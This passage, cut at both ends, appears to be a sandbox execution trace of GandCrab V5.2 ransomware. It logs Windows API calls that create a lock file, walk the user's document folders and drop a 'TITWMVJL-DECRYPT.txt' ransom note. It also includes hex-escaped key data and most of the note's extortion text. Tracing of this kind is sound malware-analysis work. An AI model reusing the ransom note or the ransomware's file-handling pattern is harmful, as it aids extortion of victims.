5\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0089.878] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0089.879] CloseHandle (hObject=0x2bc) returned 1 [0089.879] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.879] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.879] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x23, wMilliseconds=0xc1)) [0089.879] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.880] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0089.880] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0089.880] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\d2ca4a09d2ca4deb61a.lock") returned 95 [0089.880] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0089.880] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.880] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.881] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\") returned 71 [0089.881] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\*" [0089.881] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x503838 [0089.881] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.881] FindNextFileW (in: hFindFile=0x503838, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0089.881] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.881] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.881] FindNextFileW (in: hFindFile=0x503838, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0089.881] lstrcmpW (lpString1="3tz7peEsTvuM", lpString2=".") returned 1 [0089.881] lstrcmpW (lpString1="3tz7peEsTvuM", lpString2="..") returned 1 [0089.881] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\", lpString2="3tz7peEsTvuM" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM" [0089.881] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\" [0089.881] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0089.881] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0089.881] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0089.882] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0089.882] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0089.882] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0089.882] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0089.882] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0089.882] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0089.882] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.882] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.882] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\\\TITWMVJL-DECRYPT.txt") returned 105 [0089.882] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\3tz7peestvum\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0089.883] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\